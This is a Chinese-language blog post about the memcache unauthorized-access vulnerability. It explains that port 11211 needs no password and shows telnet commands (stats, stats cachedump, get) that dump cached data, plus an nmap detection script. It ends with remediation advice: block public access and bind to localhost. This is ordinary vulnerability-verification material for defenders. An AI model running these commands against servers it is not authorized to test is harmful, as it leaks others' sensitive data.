memcache是国外社区网站Live Journal的开发团队开发的高性能的分布式内存缓存服务器。
一般的使用目的是,通过缓存数据库查询结果,减少数据库访问次数,以提高动态Web应用的速度、提高扩展性。
memcache的默认端口是11211,不需要密码即可访问,黑客直接访问即可获取数据库中所有信息,造成严重的信息泄露。
漏洞验证
利用telnet 探测目标11211端口
telnet xx.xx.xx.xx 11211
无需用户名密码,可以直接链接memcache服务的11211端口。
stats //查看memcache 服务状态 stats items //查看所有items stats cachedump 32 0 //获得缓存key get :state:264861539228401373:261588 //通过key读取相应value ,获得实际缓存内容,造成敏感信息泄露
也可也使用nmap脚本检测
nmap -sV -p 端口 --script memcached-info IP
修复方案
memcache无权限控制功能,所以需要对访问来源进行限制。
1.禁止公网访问11211端口 2.设置监听ip为 127.0.0.1:11211
您可能感兴趣的文章
本文地址:http://www.ouyangxiaoze.com/2020/02/563.html
文章标签:memcache未授权访问 , memcache漏洞复现 , 未授权访问
版权声明:本文为原创文章,版权归 欧阳小泽 所有,欢迎分享本文,转载请保留出处!
文章标签:memcache未授权访问 , memcache漏洞复现 , 未授权访问
版权声明:本文为原创文章,版权归 欧阳小泽 所有,欢迎分享本文,转载请保留出处!